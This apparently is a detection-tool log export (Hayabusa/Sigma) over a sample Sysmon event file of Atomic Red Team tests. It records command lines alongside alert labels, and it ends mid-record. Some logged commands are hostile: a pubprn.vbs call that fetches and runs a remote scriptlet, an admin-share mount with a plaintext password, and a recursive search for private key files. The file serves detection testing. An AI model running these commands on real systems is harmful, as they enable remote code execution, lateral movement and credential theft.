+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.157 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.240 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.834 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.882 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:36.882 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:37.264 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.050 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.050 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.085 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.085 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:41.109 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:46.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.466 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.466 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.524 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.557 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.570 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:57.570 +00:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation_sysmon/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:31.690 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.150 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.180 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.180 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.227 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.249 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.249 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.304 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.335 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.335 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.413 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.413 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.463 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.497 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.497 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.551 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.585 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.585 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.678 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.678 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.728 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.743 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.743 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.789 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.807 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.850 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.868 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.868 +00:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation_sysmon/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.921 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:49:32.937 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | 